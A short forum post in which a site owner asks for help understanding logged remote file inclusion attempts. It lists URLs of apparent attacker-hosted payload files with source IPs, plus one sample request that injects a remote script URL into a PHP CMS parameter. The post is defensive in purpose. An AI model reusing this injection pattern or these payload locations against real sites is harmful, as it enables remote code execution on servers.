Hi I was wondering if someone had a couple of minutes to check out these links and tell me what the code is attempting to do.
http://geocities.com/rais_corp/tusuk.txt??? | IP: 59.125.211.84
http://www.iglesialcs.cl/newweb/images/id2.txt?? | IP: 85.119.244.16
http://www.phanom.ac.th/msnlist/id.txt | IP: 85.214.28.190
http://www.rom.as.ro/id1.txt | IP: 67.205.76.81
http://www.trosken.com/test.txt | IP: 203.146.102.38
http://russianinterpreter.ru/images/stories/idd.txt | IP: 74.200.223.106
http://geocities.com/rais_corp/tusuk.txt??? | IP: 59.125.211.84
An example of them being run are as follows:
mysite//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://geocities.com/rais_corp/tusuk.txt???
luckly I have a very good method of tracking 404 errors so if a hacker hits a 404 I am able to catch him and block the IP address reletively quickly.
As you can see I have included the ip addresses of the machines attempting to run these files against my site.
All help greatly appreaciated.
zeroanarchy